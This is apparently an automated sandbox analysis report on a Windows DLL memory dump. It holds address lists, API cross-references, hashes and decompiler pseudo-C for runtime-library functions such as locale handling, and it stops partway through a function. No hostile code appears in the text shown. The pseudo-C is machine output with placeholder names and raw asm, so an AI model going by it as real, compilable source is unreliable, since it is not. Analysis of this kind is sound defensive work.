0x6dddf937
0x6dddf945
0x6dddf94a
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf981
0x6dddf983
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3
0x6dddf856
0x6dddf856
0x6dddf859
0x6dddf85d
0x6dddf861
0x6dddf86e
0x6dddf876
0x6dddf878
0x00000000
0x6dddf878
0x6dddf83f
0x6dddf83f
0x00000000
0x6dddf83f
0x6dddf83d
0x6dddf7b0
0x6dddf7b0
0x6dddf7b3
0x6dddf7b7
0x6dddf7bb
0x6dddf7c8
0x6dddf7d0
0x6dddf7d2
0x00000000
0x6dddf7d2
0x6dddf799
0x6dddf799
0x00000000
0x6dddf799
0x6dddf797
0x6dddf70a
0x6dddf70a
0x6dddf70d
0x6dddf711
0x6dddf715
0x6dddf722
0x6dddf72a
0x6dddf72c
0x00000000
0x6dddf72c
0x6dddf6f3
0x6dddf6f3
0x00000000
0x6dddf6f3
0x6dddf6f1
0x6dddf664
0x6dddf664
0x6dddf667
0x6dddf66b
0x6dddf66f
0x6dddf67c
0x6dddf684
0x6dddf686
0x00000000
0x6dddf686
0x6dddf64d
0x6dddf64d
0x00000000
0x6dddf64d
0x6dddf64b
0x6dddf5be
0x6dddf5be
0x6dddf5c1
0x6dddf5c5
0x6dddf5c9
0x6dddf5d6
0x6dddf5de
0x6dddf5e0
0x00000000
0x6dddf5e0
0x6dddf5a7
0x6dddf5a7
0x00000000
0x6dddf5a7
0x6dddf5a5
0x6dddf518
0x6dddf518
0x6dddf51b
0x6dddf51f
0x6dddf523
0x6dddf530
0x6dddf538
0x6dddf53a
0x00000000
0x6dddf53a
0x6dddf501
0x6dddf501
0x00000000
0x6dddf501
0x6dddf4ff
0x6dddf472
0x6dddf472
0x6dddf475
0x6dddf479
0x6dddf47d
0x6dddf48a
0x6dddf492
0x6dddf494
0x00000000
0x6dddf494
0x6dddf45b
0x6dddf45b
0x00000000
0x6dddf45b
0x6dddf459
0x6dddf3cc
0x6dddf3cc
0x6dddf3cf
0x6dddf3d3
0x6dddf3d7
0x6dddf3e4
0x6dddf3ec
0x6dddf3ee
0x00000000
0x6dddf3ee
0x6dddf3b5
0x6dddf3b5
0x00000000
0x6dddf3b5
0x6dddf3b3
0x6dddf326
0x6dddf326
0x6dddf329
0x6dddf32d
0x6dddf331
0x6dddf33e
0x6dddf346
0x6dddf348
0x00000000
0x6dddf348
0x6dddf30f
0x6dddf30f
0x00000000
0x6dddf30f
0x6dddf30d
0x6dddf280
0x6dddf280
0x6dddf283
0x6dddf287
0x6dddf28b
0x6dddf298
0x6dddf2a0
0x6dddf2a2
0x00000000
0x6dddf2a2
0x6dddf269
0x6dddf269
0x00000000
0x6dddf269
0x6dddf267

APIs

__EH_prolog3.LIBCMT ref: 6DDDF230
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF23A
int.LIBCPMT ref: 6DDDF251

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

messages.LIBCPMT ref: 6DDDF274
std::_Facet_Register.LIBCPMT ref: 6DDDF28B
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF2AB
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF2C9

Strings

lmm, xrefs: 6DDDF245

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID: lmm
API String ID: 438560357-2367748141
Opcode ID: 0d467e6add125988b5e45caa002f3ffea003f5d5c493ebb3c8edee23b1f6205b
Instruction ID: 58f20b1c89b14730b489fc61ca31d58e4a320212ec0119508bb2695bfa7fb71c
Opcode Fuzzy Hash: 0d467e6add125988b5e45caa002f3ffea003f5d5c493ebb3c8edee23b1f6205b
Instruction Fuzzy Hash: B111C276808119DBCF01FBA4C840AFDB774AF84718F264109F621AB294DF749A05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1E984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DE1E984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_t151 =  *0x6de9506c; // 0x20895150
				_v8 = _t151 ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6DE1D5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6DE1DE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6DE1F26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6DE191A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6DE12188();
									asm("int3");
									_t171 =  *0x6de976f0; // 0x1536540
									 *0x6de95108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6de951c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6de951ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6DE1DB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6DE26102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6de40ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6DDF1C3C( &_v528,  *0x6de951e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6de40de8; // 0x6ddd815c
									 *0x6de3a26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6de952b0;
										if(_t233 != 0x6de952b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
												E6DE1CBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6DE1CBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6DE1CBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6DE1CBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6DE1CBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6DDEF8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

0x6de1e987
0x6de1e98f
0x6de1e996
0x6de1e999
0x6de1e99a
0x6de1e99d
0x6de1e9a1
0x6de1e9a2
0x6de1e9a5
0x6de1e9b5
0x6de1e9d8
0x6de1e9dd
0x6de1e9e2
0x6de1e9f7
0x6de1e9fa
0x6de1e9fa
0x6de1e9fd
0x6de1ea03
0x6de1ea09
0x6de1ea0c
0x6de1ea0e
0x6de1ea11
0x6de1ea18
0x6de1ea1b
0x6de1ea21
0x00000000
0x00000000
0x6de1ea23
0x6de1ea27
0x6de1ea50
0x6de1ea50
0x6de1ea29
0x6de1ea29
0x6de1ea2d
0x6de1ea31
0x6de1ea38
0x6de1ea3e
0x00000000
0x6de1ea40
0x6de1ea40
0x6de1ea43
0x6de1ea46
0x6de1ea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1ea4e
0x6de1ea3e
0x6de1ea5d
0x6de1ea5d
0x6de1ea5f
0x6de1ea65
0x6de1ea6b
0x6de1ea6e
0x6de1ea6e
0x6de1ea71
0x6de1ea74
0x6de1ea74
0x6de1ea84
0x6de1ea92
0x6de1ea97
0x6de1ea9e
0x6de1eaa0
0x00000000
0x6de1eaa6
0x6de1eaac
0x6de1eab2
0x6de1eab9
0x6de1eabf
0x6de1eac2
0x6de1eac8
0x6de1ead5
0x6de1eadc
0x6de1eae1
0x6de1eae4
0x6de1eae6
0x6de1ed3f
0x6de1ed45
0x6de1ed46
0x6de1ed47
0x6de1ed48
0x6de1ed49
0x6de1ed4a
0x6de1ed4f
0x6de1ed50
0x6de1ed5b
0x6de1ed63
0x6de1ed69
0x6de1ed6c
0x6de1ed71
0x6de1eaec
0x6de1eaec
0x6de1eafa
0x6de1eafd
0x6de1eb18
0x6de1eb1f
0x6de1eb25
0x6de1eb2b
0x6de1eaff
0x6de1eaff
0x6de1eb07
0x00000000
0x6de1eb09
0x6de1eb09
0x6de1eb0f
0x6de1eb0f
0x6de1eb07
0x6de1eb32
0x6de1eb35
0x6de1ec52
0x6de1ec55
0x6de1ec62
0x6de1ec65
0x6de1ec6d
0x6de1ec6d
0x6de1ec57
0x6de1ec5d
0x6de1ec5d
0x6de1eb3b
0x6de1eb3b
0x6de1eb41
0x6de1eb49
0x6de1eb4b
0x6de1eb4e
0x6de1eb57
0x6de1eb60
0x6de1eb66
0x6de1eb66
0x6de1eb69
0x6de1eb6b
0x00000000
0x00000000
0x6de1eb6d
0x6de1eb73
0x6de1eb74
0x6de1eb7f
0x6de1eb87
0x6de1eb8f
0x6de1eb92
0x6de1eb95
0x6de1eb9b
0x6de1eba1
0x6de1eba7
0x6de1ebad
0x6de1ebb0
0x00000000
0x00000000
0x6de1ebb2
0x6de1ebd7
0x6de1ebd7
0x6de1ebda
0x6de1ebde
0x6de1ebf7
0x6de1ebfc
0x6de1ebff
0x6de1ec01
0x6de1ec07
0x6de1ec42
0x6de1ec09
0x6de1ec09
0x6de1ec0e
0x6de1ec16
0x6de1ec17
0x6de1ec17
0x6de1ec2e
0x6de1ec35
0x6de1ec38
0x6de1ec3d
0x6de1ec3d
0x6de1ec45
0x6de1ec48
0x6de1ec48
0x6de1ec4d
0x00000000
0x6de1ec4d
0x6de1ebb4
0x6de1ebb6
0x6de1ebbb
0x6de1ebc1
0x6de1ebca
0x6de1ebd3
0x6de1ebd3
0x00000000
0x6de1ebb6
0x6de1ec70
0x6de1ec70
0x6de1ec74
0x6de1ec7c
0x6de1ec82
0x6de1ec85
0x6de1ec8b
0x6de1ec8d
0x6de1eccd
0x6de1ecd3
0x6de1ecda
0x6de1ecda
0x6de1ece0
0x6de1ece4
0x00000000
0x6de1ece6
0x6de1ece6
0x6de1ecea
0x6de1ecef
0x6de1ecf3
0x6de1ecf8
0x6de1ecff
0x6de1ed0d
0x6de1ed13
0x6de1ed16
0x6de1ed16
0x6de1ece4
0x6de1ed25
0x6de1ed2d
0x6de1ed36
0x6de1ec8f
0x6de1ec95
0x6de1ec98
0x6de1ec9f
0x6de1ecb1
0x6de1ecb8
0x6de1ecc5
0x00000000
0x6de1ecc5
0x00000000
0x6de1ec8d
0x6de1eae6
0x6de1ea61
0x00000000
0x6de1ea61
0x00000000
0x6de1ea5f
0x6de1ea58
0x6de1ea5a
0x6de1ea5a
0x00000000
0x6de1e9e4
0x6de1e9e4
0x6de1e9e6
0x6de1e9ea
0x6de1e9f6
0x6de1e9f6
0x00000000

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

_memcmp.LIBVCRUNTIME ref: 6DE1EC2E
_free.LIBCMT ref: 6DE1EC9F
_free.LIBCMT ref: 6DE1ECB8
_free.LIBCMT ref: 6DE1ECEA
_free.LIBCMT ref: 6DE1ECF3
_free.LIBCMT ref: 6DE1ECFF

Strings

C, xrefs: 6DE1EAEC

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: ab2246f54737ec5ed7c9c8d16f15ab7d6b5fea39212218919199f84ad1841bea
Instruction ID: 769884c0d9fd666be619ceee04bcc338422615160f43162fe9bd706723e733ea
Opcode Fuzzy Hash: ab2246f54737ec5ed7c9c8d16f15ab7d6b5fea39212218919199f84ad1841bea
Instruction Fuzzy Hash: 6FC11D75A0961A9FDB24CF18CC84AADB7B4FF49708F2085AAE549E7750DB31AD90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6DDDFC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t66 - 0x14, 0);
				_t63 =  *0x6de96dd0; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6DDB161C(0x6de96d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6DDB171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6DDD66BA(_t66 - 0x14);
					return E6DDF0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6DDE162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6DDB1438(_t55);
							E6DDF3D74(_t66 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de3851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6de3c0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6DDE542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6DDF0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6DDD6FD3(__eflags, _t61);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6de96dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

0x6dddfc89
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcba
0x6dddfcbf
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7

APIs

__EH_prolog3.LIBCMT ref: 6DDDFC90
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFC9A
int.LIBCPMT ref: 6DDDFCB1

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFCEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFD0B
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFD29

Strings

`mm, xrefs: 6DDDFCA5

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: `mm
API String ID: 651022567-4209129558
Opcode ID: 1eac9f68c0e85ff5a94b0829cd57c23cbaa267ca3967cf6b0f5389e7e997b6d6
Instruction ID: 28fe5fdf78197cc18ebc6580fc01403bc14ae7d8aa53fd79641eb367f98ebf02
Opcode Fuzzy Hash: 1eac9f68c0e85ff5a94b0829cd57c23cbaa267ca3967cf6b0f5389e7e997b6d6
Instruction Fuzzy Hash: 7211C275948229DBCF01FB64C840AFDB775AF84318F264409F521AB290DF749A01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

